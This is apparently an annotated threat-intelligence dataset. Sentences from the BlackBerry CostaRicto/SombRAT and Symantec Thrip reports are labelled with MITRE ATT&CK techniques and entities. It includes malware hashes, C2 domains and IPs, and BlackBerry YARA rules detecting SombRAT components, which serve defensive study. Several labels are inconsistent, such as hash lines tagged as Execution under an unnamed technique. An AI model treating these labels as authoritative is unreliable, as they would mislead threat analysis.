"name": "Execution" } ], "techniques": [ { "id": "T1024.002", "name": "" } ], "procedure": "deployed SombRAT x86 loader", "entities": [ { "text": "SombRAT x86 loader", "start": 2, "end": 20, "label": "MalwareTool" }, { "text": "f6ecdae3ae4769aaafc8a0faab30cb66dab8c9d3fff27764ff208be7a455125c", "start": 21, "end": 85, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-86_mitre_report-p1-s85-11d5f8", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 85, "context_before": "| SombRAT x86 loader f6ecdae3ae4769aaafc8a0faab30cb66dab8c9d3fff27764ff208be7a455125c | SHA256", "sentence_text": "| SombRAT x86 loader 561bf3f3db67996ce81d98f1df91bfa28fb5fc8472ed64606ef8427a97fd8cdd |", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1024.002", "name": "" } ], "procedure": "deployed SombRAT x86 loader", "entities": [ { "text": "SombRAT x86 loader", "start": 2, "end": 20, "label": "MalwareTool" }, { "text": "561bf3f3db67996ce81d98f1df91bfa28fb5fc8472ed64606ef8427a97fd8cdd", "start": 21, "end": 85, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-86_mitre_report-p1-s86-3386ca", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 86, "context_before": "| SombRAT x86 loader 561bf3f3db67996ce81d98f1df91bfa28fb5fc8472ed64606ef8427a97fd8cdd |", "sentence_text": "SHA256 | SombRAT x86 payload (memory dump)", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1024", "name": "Custom Cryptographic Protocol" } ], "procedure": "deployed SombRAT x86 payload", "entities": [ { "text": "SombRAT x86 payload ", "start": 9, "end": 29, "label": "MalwareTool" } ] }, { "uid": "mitre-86_mitre_report-p1-s87-f95f4f", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 87, "context_before": "SHA256 | SombRAT x86 payload (memory dump)", "sentence_text": "8323094c43fcd2da44f60b46f043f7ca4ad6a2106b6561598e94008ece46168b | SHA256", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s88-e62fc4", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 88, "context_before": "8323094c43fcd2da44f60b46f043f7ca4ad6a2106b6561598e94008ece46168b | SHA256", "sentence_text": "| SombRAT x86 payload ee0f4afee2940bbe895c1f1f60b8967291a2662ac9dca9f07d9edf400d34b58a ee0f4afee2940bbe895c1f1f60b8967291a2662ac9dca9f07d9edf400d34b58a | SHA256 | SombRAT x86 payload (UPX)\n70d63029c65c21c4681779e1968b88dc6923f92408fe5c7e9ca6cb86d7ba713a", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1024.002", "name": "" } ], "procedure": "deployed SombRAT x86 payload", "entities": [ { "text": "SombRAT x86 payload ", "start": 2, "end": 22, "label": "MalwareTool" }, { "text": "SombRAT x86 payload ", "start": 163, "end": 183, "label": "MalwareTool" }, { "text": "ee0f4afee2940bbe895c1f1f60b8967291a2662ac9dca9f07d9edf400d34b58a ee0f4afee2940bbe895c1f1f60b8967291a2662ac9dca9f07d9edf400d34b58a ", "start": 22, "end": 152, "label": "Infrastructure_Indicator" }, { "text": "70d63029c65c21c4681779e1968b88dc6923f92408fe5c7e9ca6cb86d7ba713a", "start": 189, "end": 253, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-86_mitre_report-p1-s89-26d725", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 89, "context_before": "| SombRAT x86 payload ee0f4afee2940bbe895c1f1f60b8967291a2662ac9dca9f07d9edf400d34b58a ee0f4afee2940bbe895c1f1f60b8967291a2662ac9dca9f07d9edf400d34b58a | SHA256 | SombRAT x86 payload (UPX)\n70d63029c65c21c4681779e1968b88dc6923f92408fe5c7e9ca6cb86d7ba713a", "sentence_text": "79009ee869cec789a3d2735e0a81a546b33e320ee6ae950ba236a9f417ebf763 | SHA256 | SombRAT decoded payload (x64)", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1024.002", "name": "" } ], "procedure": "deployed SombRAT decoded payload", "entities": [ { "text": "79009ee869cec789a3d2735e0a81a546b33e320ee6ae950ba236a9f417ebf763", "start": 0, "end": 64, "label": "Infrastructure_Indicator" }, { "text": "SombRAT decoded payload", "start": 76, "end": 99, "label": "MalwareTool" } ] }, { "uid": "mitre-86_mitre_report-p1-s90-40c7b1", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 90, "context_before": "79009ee869cec789a3d2735e0a81a546b33e320ee6ae950ba236a9f417ebf763 | SHA256 | SombRAT decoded payload (x64)", "sentence_text": "d8189ebdec637fc83276654635343fb422672fc5e3e2818df211fb7c878a3155 | SHA256 | Payload stager fa74f70baa15561c28c793b189102149d3fb4f24147adc5efbd8656221c0960b | SHA256 | GO-socks5 proxy c0db3dadf2e270240bb5cad8a652e5e11e3afe41b8ee106d67d47b06f5163261 | SHA256 | Pcheck proxy 6df8271ae0380737734b2dd6d46d0db3a30ba35d7379710a9fb05d1510495b49 | SHA256 | Pcheck proxy 7424d6daab8407e85285709dd27b8cce7c633d3d4a39050883ad9d82b85198bf | SHA256 | Pscan port scanner svolcdst.exe | Filename | SombRAT loader tunnusvcen.exe | Filename | SombRAT loader C:\\Projects\\Sombra\\_Bin\\x64\\Release\\Sombra.pdb | PDB path | SombRAT x64 C:\\Wokrflow\\CostaRicto\\Release\\CostaBricks.pdb", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s91-3efa65", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 91, "context_before": "d8189ebdec637fc83276654635343fb422672fc5e3e2818df211fb7c878a3155 | SHA256 | Payload stager fa74f70baa15561c28c793b189102149d3fb4f24147adc5efbd8656221c0960b | SHA256 | GO-socks5 proxy c0db3dadf2e270240bb5cad8a652e5e11e3afe41b8ee106d67d47b06f5163261 | SHA256 | Pcheck proxy 6df8271ae0380737734b2dd6d46d0db3a30ba35d7379710a9fb05d1510495b49 | SHA256 | Pcheck proxy 7424d6daab8407e85285709dd27b8cce7c633d3d4a39050883ad9d82b85198bf | SHA256 | Pscan port scanner svolcdst.exe | Filename | SombRAT loader tunnusvcen.exe | Filename | SombRAT loader C:\\Projects\\Sombra\\_Bin\\x64\\Release\\Sombra.pdb | PDB path | SombRAT x64 C:\\Wokrflow\\CostaRicto\\Release\\CostaBricks.pdb", "sentence_text": "| SombRAT C2 infosportals[.]com | Domain | SombRAT", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s92-ac777f", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 92, "context_before": "| SombRAT C2 infosportals[.]com | Domain | SombRAT", "sentence_text": "C2 akams[.]in | Domain | SombRAT", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s93-a88c33", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 93, "context_before": "C2 akams[.]in | Domain | SombRAT", "sentence_text": "C2 newspointview[.]com | Domain | SombRAT", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s94-d19276", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 94, "context_before": "C2 newspointview[.]com | Domain | SombRAT", "sentence_text": "C2 159.65.31.84 | IP | SombRAT hosting place 212.83.61.227 | IP | sbibd[.]net 144.217.53.146 | IP | sbibd[.]net, akams[.]in,", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s95-8271f2", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 95, "context_before": "C2 159.65.31.84 | IP | SombRAT hosting place 212.83.61.227 | IP | sbibd[.]net 144.217.53.146 | IP | sbibd[.]net, akams[.]in,", "sentence_text": "infosportals[.]com 45.89.175.206 | IP | akams[.]in 45.138.172.54 | IP | newspointview[.]com 212.114.52.98 | IP | infosportals[.]com Initial Access | T1078 | Valid Accounts | Suspected initial compromise using stolen credentials", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Used stolen credentials to gain initial access.", "entities": [ { "text": "infosportals[.]com ", "start": 0, "end": 19, "label": "Infrastructure_Indicator" }, { "text": "45.89.175.206 ", "start": 19, "end": 33, "label": "Infrastructure_Indicator" }, { "text": "akams[.]in", "start": 40, "end": 50, "label": "Infrastructure_Indicator" }, { "text": "45.138.172.54", "start": 51, "end": 64, "label": "Infrastructure_Indicator" }, { "text": "newspointview[.]com", "start": 72, "end": 91, "label": "Infrastructure_Indicator" }, { "text": "212.114.52.98 ", "start": 92, "end": 106, "label": "Infrastructure_Indicator" }, { "text": "infosportals[.]com", "start": 113, "end": 131, "label": "Infrastructure_Indicator" }, { "text": "Suspected initial compromise using stolen credentials", "start": 174, "end": 227, "label": "Action" } ] }, { "uid": "mitre-86_mitre_report-p1-s96-1cdd9d", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 96, "context_before": "infosportals[.]com 45.89.175.206 | IP | akams[.]in 45.138.172.54 | IP | newspointview[.]com 212.114.52.98 | IP | infosportals[.]com Initial Access | T1078 | Valid Accounts | Suspected initial compromise using stolen credentials", "sentence_text": "Execution | T1106 | Execution through API | SombRAT – C2 command Discovery | T1057", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s97-f2c694", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 97, "context_before": "Execution | T1106 | Execution through API | SombRAT – C2 command Discovery | T1057", "sentence_text": "| Process Discovery | SombRAT – C2 command T1082 | System Information Discovery | SombRAT – C2 command T1124 | System Time Discovery | SombRAT – C2 command Collection | T1560/003 | Archive Collected Data: Archive via Custom Method | SombRAT – Custom storage file Command and Control | T1572", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s98-3d0e9a", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 98, "context_before": "| Process Discovery | SombRAT – C2 command T1082 | System Information Discovery | SombRAT – C2 command T1124 | System Time Discovery | SombRAT – C2 command Collection | T1560/003 | Archive Collected Data: Archive via Custom Method | SombRAT – Custom storage file Command and Control | T1572", "sentence_text": "| Protocol Tunneling | SombRAT - DNS tunnelling for C2 T1071/001 | Application Layer Protocol: Web Protocols | SombRAT – HTTP for C2 T1573/002 | Encrypted Channel:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s99-4198ba", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 99, "context_before": "| Protocol Tunneling | SombRAT - DNS tunnelling for C2 T1071/001 | Application Layer Protocol: Web Protocols | SombRAT – HTTP for C2 T1573/002 | Encrypted Channel:", "sentence_text": "Asymmetric Cryptography | SombRAT – RSA for C2 encryption Exfiltration | T1041", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s100-3709f2", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 100, "context_before": "Asymmetric Cryptography | SombRAT – RSA for C2 encryption Exfiltration | T1041", "sentence_text": "| Exfiltration Over C2 Channel | SombRAT import \"pe\" import \"hash\" rule costaricto_vm_dropper { meta: description = \"Rule to detect SombRAT loader by code similarity\" author = \"BlackBerry Threat Hunting and Intelligence Team\" strings: // vm class name $classname = \"VMBASERUNNER\" ascii wide nocase // start of vm bytecode $vmbytecode = {37C7359438C73594} // start of encrypted payload $encpayload_1 = {77D2C7AC59B2EB0DF37028AC950971FB} // binary string from enc payload (some payloads differ only in the header) $encpayload_2 = {06359D29C83125C321C201CF9AE7D1626B8F4281C33617EECE86BD106C628FE593936F00C2C 68E28843BE5374F876840FCD1BFD014D5DEFF4BA8EB6A5FFFB24F932138B04C1BE6D5BD8BB572B8116799AE1C8F0 D5DB774ABA4884B9E706981FC3740B4CD891F8A0EA6900D41B675CFC98A} // vm execution loop $vmcode_1 = {8B ??", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s124-6e786f", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 124, "context_before": "89 ??", "sentence_text": "75 B9} // vm execution loop (sample from Nov 2019) $vmcode_2 = {8B ??", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s141-51d0fa", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 141, "context_before": "02 3B ??", "sentence_text": "75 C7} condition: uint16(0) == 0x5a4d and filesize < 5MB and filesize > 20KB and any of them } rule costaricto_vm_dropper_pdb_path { meta: description = \"Rule to detect samples with CostaRicto PDB path\" author = \"BlackBerry Threat Hunting and Intelligence Team\" pdb_string = \"C:\\\\Wokrflow\\\\CostaRicto\\\\Release\\\\CostaBricks.pdb\" strings: $a = \"CostaRicto\" ascii wide nocase $b = \"CostaBricks.pdb\" ascii wide nocase $c1 = \"C:\\\\Wokrflow\\\\\" ascii wide nocase $c2 = \"Release\" ascii wide nocase $c3 = \".pdb\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s142-027215", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 142, "context_before": "75 C7} condition: uint16(0) == 0x5a4d and filesize < 5MB and filesize > 20KB and any of them } rule costaricto_vm_dropper_pdb_path { meta: description = \"Rule to detect samples with CostaRicto PDB path\" author = \"BlackBerry Threat Hunting and Intelligence Team\" pdb_string = \"C:\\\\Wokrflow\\\\CostaRicto\\\\Release\\\\CostaBricks.pdb\" strings: $a = \"CostaRicto\" ascii wide nocase $b = \"CostaBricks.pdb\" ascii wide nocase $c1 = \"C:\\\\Wokrflow\\\\\" ascii wide nocase $c2 = \"Release\" ascii wide nocase $c3 = \".pdb\"", "sentence_text": "ascii wide nocase condition: uint16(0) == 0x5a4d and filesize < 5MB and filesize > 20KB and ($a or $b or all of ($c*)) } rule costaricto_sobmrat_pdb_path { meta: description = \"Rule to detect samples with SombRAT PDB path\" author = \"BlackBerry Threat Hunting and Intelligence Team\" pdb_string = \"C:\\\\Projects\\\\Sombra\\\\_Bin\\\\x64\\\\Release\\\\Sombra.pdb\" pdb_string_2 = \"c:\\\\projects\\\\sombra\\\\libraries\" strings: $a = \"\\\\Projects\\\\Sombra\\\\\" ascii wide nocase $b = \"Sombra.pdb\" ascii wide nocase condition: uint16(0) == 0x5a4d and filesize < 5MB and filesize > 20KB and ($a or $b) } rule costaricto_backdoored_blink { meta: description = \"Rule to detect backdoored Blink application\" author = \"BlackBerry Threat Hunting and Intelligence Team\" strings: $a1 = \"Failed to open target application process!\"", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204.002", "name": "Malicious File" } ], "procedure": "uses SombRAT and a backdoored blink application", "entities": [ { "text": "SombRAT", "start": 205, "end": 212, "label": "MalwareTool" }, { "text": "backdoored Blink application", "start": 648, "end": 676, "label": "MalwareTool" } ] }, { "uid": "mitre-86_mitre_report-p1-s143-6e9c91", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 143, "context_before": "ascii wide nocase condition: uint16(0) == 0x5a4d and filesize < 5MB and filesize > 20KB and ($a or $b or all of ($c*)) } rule costaricto_sobmrat_pdb_path { meta: description = \"Rule to detect samples with SombRAT PDB path\" author = \"BlackBerry Threat Hunting and Intelligence Team\" pdb_string = \"C:\\\\Projects\\\\Sombra\\\\_Bin\\\\x64\\\\Release\\\\Sombra.pdb\" pdb_string_2 = \"c:\\\\projects\\\\sombra\\\\libraries\" strings: $a = \"\\\\Projects\\\\Sombra\\\\\" ascii wide nocase $b = \"Sombra.pdb\" ascii wide nocase condition: uint16(0) == 0x5a4d and filesize < 5MB and filesize > 20KB and ($a or $b) } rule costaricto_backdoored_blink { meta: description = \"Rule to detect backdoored Blink application\" author = \"BlackBerry Threat Hunting and Intelligence Team\" strings: $a1 = \"Failed to open target application process!\"", "sentence_text": "$a2 = \"Machine architecture mismatch between target application and this application!\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s144-637163", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 144, "context_before": "$a2 = \"Machine architecture mismatch between target application and this application!\"", "sentence_text": "$a3 = \"Failed to create new communication pipe!\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s145-a245f0", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 145, "context_before": "$a3 = \"Failed to create new communication pipe!\"", "sentence_text": "meta: description = \"Rule to detect Rich header associated with CostaRicto campaign\" author = \"BlackBerry Threat Hunting and Intelligence Team\" condition: pe.rich_signature.toolid(0xf1, 40116) and pe.rich_signature.toolid(0xf2, 40116) and pe.rich_signature.toolid(0xf3, 40116) and pe.rich_signature.toolid(0x102, 26428) and pe.rich_signature.toolid(0x103, 26131) and pe.rich_signature.toolid(0x104, 26131) and pe.rich_signature.toolid(0x105, 26131) and pe.rich_signature.toolid(0x103, 26433) and pe.rich_signature.toolid(0x104, 26433) and pe.rich_signature.toolid(0x109, 26428) and pe.rich_signature.toolid(0x93, 30729) and pe.rich_signature.toolid(0xff, 26428) } rule costaricto_rich_xor_key { meta: description = \"Rule to detect Rich header associated with CostaRicto campaign\" author = \"BlackBerry Threat Hunting and Intelligence Team\" condition: // x86 droppers pe.rich_signature.key == 0x2e8d923f or pe.rich_signature.key == 0x97d94c45 or // x86 payload pe.rich_signature.key == 0xef257087 or pe.rich_signature.key == 0x4f257087 or pe.rich_signature.key == 0x1e816e7e or // x64 payload pe.rich_signature.key == 0xd1e5ae6c or pe.rich_signature.key == 0x5df9c60b } rule costaricto_sombrat_unpacked { meta: description = \"Rule to detect unpacked SombRAT backdoor\" author = \"BlackBerry Threat Hunting and Intelligence Team\" strings: // class names $a1 = \"PEHeadersBackup\" $a2 = \"PeLoaderDummy\" $a3 = \"PeLoaderLocal\" $a4 = \"PeLoaderBaseClass\" $a5 = \"PDTaskman\" $a6 = \"PDMessageParamArray\" $a7 = \"NetworkDriverLayerWebsockets\" $a8 = \"NetworkDriverLayerDNSReader\" $a9 = \"WaitForPluginIOCPFullyClosed\" // substitution-encrypted strings $b1 = \"~ydcv{{rs{~|r\"           // installedlike $b2 = \"~yg{vcqxez\"              // winplatform $b3 = \"~yqxezvc~xyvttrgcrs\"     // informationaccepted $b4 = \"xvsqexzdcxevpr\"          // loadfromstorage $b5 = \"xvsqexzzrzxen\"           // loadfrommemory $b7 = \"xgrydcxevpr\"             // openstorage $b8 = \"g{bp~y{xvstxzg{rcr\"      // pluginloadcomplete $b9 = \"g{bp~yby{xvs\"            // pluginunload // AES-encrypted strings $c1 = {44 5B 7F 52 0C 13 52 1A 16 45 4C 75 65 72 60 53} // RSA public key $d1 = {EF C9 77 B9 A3 8E 48 92 77 C8 E1 E1 0C 46 35 2B} condition: uint16(0) == 0x5a4d and filesize < 5MB and filesize > 20KB and any of them } rule costaricto_pcheck_proxy { meta: description = \"Rule to detect a custom proxy tool related to the CostaRicto campaign\" author = \"BlackBerry Threat Hunting and Intelligence Team\" strings: $a = \"exe.exe host host_port proxy_host proxy_port\" $b = \"Tool jobs done\" condition: uint16(0) == 0x5a4d and filesize < 500KB and filesize > 10KB and ($a or $b) } rule costaricto_pscan_port_scanner { meta: description = \"Rule to detect a custom proxy tool related to the CostaRicto campaign\" author = \"BlackBerry Threat Hunting and Intelligence Team\" strings: $a1 = \"Invalid arguments count (ver \" $a2 = \"Example: ./pscan\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-86_mitre_report-p1-s146-63df9b", "source": "mitre", "doc_id": "86_mitre_report", "page_number": 1, "sentence_id": 146, "context_before": "meta: description = \"Rule to detect Rich header associated with CostaRicto campaign\" author = \"BlackBerry Threat Hunting and Intelligence Team\" condition: pe.rich_signature.toolid(0xf1, 40116) and pe.rich_signature.toolid(0xf2, 40116) and pe.rich_signature.toolid(0xf3, 40116) and pe.rich_signature.toolid(0x102, 26428) and pe.rich_signature.toolid(0x103, 26131) and pe.rich_signature.toolid(0x104, 26131) and pe.rich_signature.toolid(0x105, 26131) and pe.rich_signature.toolid(0x103, 26433) and pe.rich_signature.toolid(0x104, 26433) and pe.rich_signature.toolid(0x109, 26428) and pe.rich_signature.toolid(0x93, 30729) and pe.rich_signature.toolid(0xff, 26428) } rule costaricto_rich_xor_key { meta: description = \"Rule to detect Rich header associated with CostaRicto campaign\" author = \"BlackBerry Threat Hunting and Intelligence Team\" condition: // x86 droppers pe.rich_signature.key == 0x2e8d923f or pe.rich_signature.key == 0x97d94c45 or // x86 payload pe.rich_signature.key == 0xef257087 or pe.rich_signature.key == 0x4f257087 or pe.rich_signature.key == 0x1e816e7e or // x64 payload pe.rich_signature.key == 0xd1e5ae6c or pe.rich_signature.key == 0x5df9c60b } rule costaricto_sombrat_unpacked { meta: description = \"Rule to detect unpacked SombRAT backdoor\" author = \"BlackBerry Threat Hunting and Intelligence Team\" strings: // class names $a1 = \"PEHeadersBackup\" $a2 = \"PeLoaderDummy\" $a3 = \"PeLoaderLocal\" $a4 = \"PeLoaderBaseClass\" $a5 = \"PDTaskman\" $a6 = \"PDMessageParamArray\" $a7 = \"NetworkDriverLayerWebsockets\" $a8 = \"NetworkDriverLayerDNSReader\" $a9 = \"WaitForPluginIOCPFullyClosed\" // substitution-encrypted strings $b1 = \"~ydcv{{rs{~|r\"           // installedlike $b2 = \"~yg{vcqxez\"              // winplatform $b3 = \"~yqxezvc~xyvttrgcrs\"     // informationaccepted $b4 = \"xvsqexzdcxevpr\"          // loadfromstorage $b5 = \"xvsqexzzrzxen\"           // loadfrommemory $b7 = \"xgrydcxevpr\"             // openstorage $b8 = \"g{bp~y{xvstxzg{rcr\"      // pluginloadcomplete $b9 = \"g{bp~yby{xvs\"            // pluginunload // AES-encrypted strings $c1 = {44 5B 7F 52 0C 13 52 1A 16 45 4C 75 65 72 60 53} // RSA public key $d1 = {EF C9 77 B9 A3 8E 48 92 77 C8 E1 E1 0C 46 35 2B} condition: uint16(0) == 0x5a4d and filesize < 5MB and filesize > 20KB and any of them } rule costaricto_pcheck_proxy { meta: description = \"Rule to detect a custom proxy tool related to the CostaRicto campaign\" author = \"BlackBerry Threat Hunting and Intelligence Team\" strings: $a = \"exe.exe host host_port proxy_host proxy_port\" $b = \"Tool jobs done\" condition: uint16(0) == 0x5a4d and filesize < 500KB and filesize > 10KB and ($a or $b) } rule costaricto_pscan_port_scanner { meta: description = \"Rule to detect a custom proxy tool related to the CostaRicto campaign\" author = \"BlackBerry Threat Hunting and Intelligence Team\" strings: $a1 = \"Invalid arguments count (ver \" $a2 = \"Example: ./pscan\"", "sentence_text": "$a3 = \"127-130.0.0.1\" $b1 = \"[output.txt]\" $b2 = \"Invalid ip address range\" condition: uint16(0) == 0x5a4d and filesize < 500KB and filesize > 10KB and any of ($a*) or all of ($b*) }", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s1-241148", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "Thrip: Espionage Group Hits Satellite, Telecoms, and Defense Companies | SECURITY.COM Skip to main content One of the most significant developments in cyber espionage in recent years has been the number of groups adopting “ living off the land ” tactics.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s2-0a64ff", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 2, "context_before": "Thrip: Espionage Group Hits Satellite, Telecoms, and Defense Companies | SECURITY.COM Skip to main content One of the most significant developments in cyber espionage in recent years has been the number of groups adopting “ living off the land ” tactics.", "sentence_text": "That’s our shorthand for the use of operating system features or legitimate network administration tools to compromise victims’ networks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s3-80547c", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 3, "context_before": "That’s our shorthand for the use of operating system features or legitimate network administration tools to compromise victims’ networks.", "sentence_text": "The purpose of living off the land is twofold.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s4-4739fc", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 4, "context_before": "The purpose of living off the land is twofold.", "sentence_text": "By using such features and tools, attackers are hoping to blend in on the victim’s network and hide their activity in a sea of legitimate processes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s5-b3aed3", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 5, "context_before": "By using such features and tools, attackers are hoping to blend in on the victim’s network and hide their activity in a sea of legitimate processes.", "sentence_text": "If everyone is using similar tools, it’s more difficult to distinguish one group from another.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s6-2d6557", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 6, "context_before": "If everyone is using similar tools, it’s more difficult to distinguish one group from another.", "sentence_text": "Most attack groups do still create and leverage custom malware, but it tends to be employed sparingly, reducing the risk of discovery.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s7-6718d6", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 7, "context_before": "Most attack groups do still create and leverage custom malware, but it tends to be employed sparingly, reducing the risk of discovery.", "sentence_text": "Finding the needle in the haystack This doesn’t mean espionage attacks are now going undiscovered, but it does mean that they can take longer for analysts to investigate.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s8-59095b", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 8, "context_before": "Finding the needle in the haystack This doesn’t mean espionage attacks are now going undiscovered, but it does mean that they can take longer for analysts to investigate.", "sentence_text": "This is one of the reasons why Symantec created Targeted Attack Analytics (TAA)\n, which takes tools and capabilities that we’ve developed for our own analysts and makes them available to our Advanced Threat Protection (ATP) customers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s9-d6b865", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 9, "context_before": "This is one of the reasons why Symantec created Targeted Attack Analytics (TAA)\n, which takes tools and capabilities that we’ve developed for our own analysts and makes them available to our Advanced Threat Protection (ATP) customers.", "sentence_text": "TAA leverages advanced artificial intelligence and machine learning that combs through Symantec’s data lake of telemetry in order to spot patterns associated with targeted attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s10-9a5a98", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 10, "context_before": "TAA leverages advanced artificial intelligence and machine learning that combs through Symantec’s data lake of telemetry in order to spot patterns associated with targeted attacks.", "sentence_text": "Its advanced AI automates what previously would have taken thousands of hours of analyst time.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s11-d3bc69", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 11, "context_before": "Its advanced AI automates what previously would have taken thousands of hours of analyst time.", "sentence_text": "It was TAA that led us to the latest cyber espionage campaign we’ve uncovered.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s12-a5851f", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 12, "context_before": "It was TAA that led us to the latest cyber espionage campaign we’ve uncovered.", "sentence_text": "Back in January 2018, TAA triggered an alert at a large telecoms operator in Southeast Asia.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-87_mitre_report-p1-s13-2532b5", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 13, "context_before": "Back in January 2018, TAA triggered an alert at a large telecoms operator in Southeast Asia.", "sentence_text": "An attacker was using PsExec to move laterally between computers on the company’s network.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1021.002", "name": "SMB/Windows Admin Shares" } ], "procedure": "Used PsExec to execute commands remotely on other computers to move laterally.", "entities": [ { "text": "PsExec", "start": 22, "end": 28, "label": "MalwareTool" }, { "text": "attacker ", "start": 3, "end": 12, "label": "ThreatActor" } ] }, { "uid": "mitre-87_mitre_report-p1-s14-27001a", "source": "mitre", "doc_id": "87_mitre_report", "page_number": 1, "sentence_id": 14, "context_before": "An attacker was using PsExec to move laterally between computers on the company’s network.", "sentence_text": "PsExec is a Microsoft Sysinternals tool for executing 